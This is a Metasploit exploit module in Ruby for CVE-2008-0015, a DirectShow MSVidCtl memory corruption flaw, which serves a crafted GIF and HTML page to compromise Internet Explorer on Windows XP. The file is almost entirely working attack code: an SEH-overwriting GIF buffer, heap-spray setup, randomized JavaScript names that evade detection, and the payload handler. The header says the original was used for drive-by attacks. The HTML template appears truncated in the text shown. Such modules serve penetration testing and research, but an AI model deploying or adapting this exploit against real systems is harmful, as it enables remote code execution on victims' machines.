## # msvidctl_mpeg2.rb # # Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption exploit for the Metasploit Framework # # Tested successfully on the following platforms (fully patched 06/07/09): # - Internet Explorer 6, Windows XP SP2 # - Internet Explorer 7, Windows XP SP3 # # Original exploit was found in-the-wild used to preform drive-by attacks via compromised Chinese web sites. # The original exploit can be found here (shellcode changed to execute calc.exe): # http://www.rec-sec.com/exploits/aa.rar # # Trancer # http://www.rec-sec.com ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption', 'Description' => %q{ This module exploits a memory corruption within the MSVidCtl component of Microsoft DirectShow (BDATuner.MPEG2TuneRequest). By loading a specially crafted GIF file, an attacker can overrun a buffer and execute arbitrary code. ClassID is now configurable via an advanced option (otherwise randomized) - I)ruid }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer ' ], 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0015' ], [ 'OSVDB', '55651' ], [ 'BID', '35558' ], [ 'URL', 'http://www.microsoft.com/technet/security/advisory/972890.mspx' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x09\x0a\x0d'\\", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ] ], 'DisclosureDate' => 'Jul 05 2009', 'DefaultTarget' => 0)) register_advanced_options( [ OptString.new('ClassID', [ false, "Specific ClassID to use (otherwise randomized)", nil ]), ], self.class) end def on_request_uri(cli, request) if (request.uri.match(/\.gif$/i)) print_status("Sending GIF to #{cli.peerhost}:#{cli.peerport}...") ret = Rex::Text.uri_encode([target.ret].pack('L')) gif = "\x00\x03\x00\x00\x11\x20\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" gif << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" gif << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" gif << "\xFF\xFF\xFF\xFF" # End of SEH chain gif << [target.ret].pack('V') # SE Handler gif << "\x00" send_response(cli, gif, { 'Content-Type' => 'image/gif' }) return end print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...") # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Class IDs allclsids = [ # all IDs from the advisory "011B3619-FE63-4814-8A84-15A194CE9CE3", # doesn't work "0149EEDF-D08F-4142-8D73-D23903D21E90", # doesn't work "0369B4E5-45B6-11D3-B650-00C04F79498E", # works "0369B4E6-45B6-11D3-B650-00C04F79498E", "055CB2D7-2969-45CD-914B-76890722F112", "0955AC62-BF2E-4CBA-A2B9-A63F772D46CF", # works "15D6504A-5494-499C-886C-973C9E53B9F1", "1BE49F30-0E1B-11D3-9D8E-00C04F72D980", "1C15D484-911D-11D2-B632-00C04F79498E", "1DF7D126-4050-47F0-A7CF-4C4CA9241333", "2C63E4EB-4CEA-41B8-919C-E947EA19A77C", "334125C0-77E5-11D3-B653-00C04F79498E", "37B0353C-A4C8-11D2-B634-00C04F79498E", "37B03543-A4C8-11D2-B634-00C04F79498E", "37B03544-A4C8-11D2-B634-00C04F79498E", "418008F3-CF67-4668-9628-10DC52BE1D08", "4A5869CF-929D-4040-AE03-FCAFC5B9CD42", "577FAA18-4518-445E-8F70-1473F8CF4BA4", "59DC47A8-116C-11D3-9D8E-00C04F72D980", "7F9CB14D-48E4-43B6-9346-1AEBC39C64D3", "823535A0-0318-11D3-9D8E-00C04F72D980", "8872FF1B-98FA-4D7A-8D93-C9F1055F85BB", "8A674B4C-1F63-11D3-B64C-00C04F79498E", "8A674B4D-1F63-11D3-B64C-00C04F79498E", "9CD64701-BDF3-4D14-8E03-F12983D86664", "9E77AAC4-35E5-42A1-BDC2-8F3FF399847C", "A1A2B1C4-0E3A-11D3-9D8E-00C04F72D980", "A2E3074E-6C3D-11D3-B653-00C04F79498E", "A2E30750-6C3D-11D3-B653-00C04F79498E", "A8DCF3D5-0780-4EF4-8A83-2CFFAACB8ACE", "AD8E510D-217F-409B-8076-29C5E73B98E8", "B0EDF163-910A-11D2-B632-00C04F79498E", "B64016F3-C9A2-4066-96F0-BD9563314726", "BB530C63-D9DF-4B49-9439-63453962E598", "C531D9FD-9685-4028-8B68-6E1232079F1E", "C5702CCC-9B79-11D3-B654-00C04F79498E", "C5702CCD-9B79-11D3-B654-00C04F79498E", "C5702CCE-9B79-11D3-B654-00C04F79498E", "C5702CCF-9B79-11D3-B654-00C04F79498E", "C5702CD0-9B79-11D3-B654-00C04F79498E", "C6B14B32-76AA-4A86-A7AC-5C79AAF58DA7", "CAAFDD83-CEFC-4E3D-BA03-175F17A24F91", "D02AAC50-027E-11D3-9D8E-00C04F72D980", "F9769A06-7ACA-4E39-9CFB-97BB35F0E77E", "FA7C375B-66A7-4280-879D-FD459C84BB02" ] clsids = [ # these all work "0369B4E5-45B6-11D3-B650-00C04F79498E", "0955AC62-BF2E-4CBA-A2B9-A63F772D46CF", ] classid = datastore['ClassID'] || clsids[rand(clsids.size)] # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Setup exploit buffers nops = Rex::Text.to_unescape([target.ret].pack('V')) blocksize = 0x40000 fillto = 500 # Randomize the javascript variable names msvidctl = rand_text_alpha(rand(100) + 1) div = rand_text_alpha(rand(100) + 1) j_shellcode = rand_text_alpha(rand(100) + 1) j_nops = rand_text_alpha(rand(100) + 1) j_headersize = rand_text_alpha(rand(100) + 1) j_slackspace = rand_text_alpha(rand(100) + 1) j_fillblock = rand_text_alpha(rand(100) + 1) j_block = rand_text_alpha(rand(100) + 1) j_memory = rand_text_alpha(rand(100) + 1) j_counter = rand_text_alpha(rand(30) + 2) html = %Q|
| print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response(cli, html, { 'Content-Type' => 'text/html' }) # Handle the payload handler(cli) end end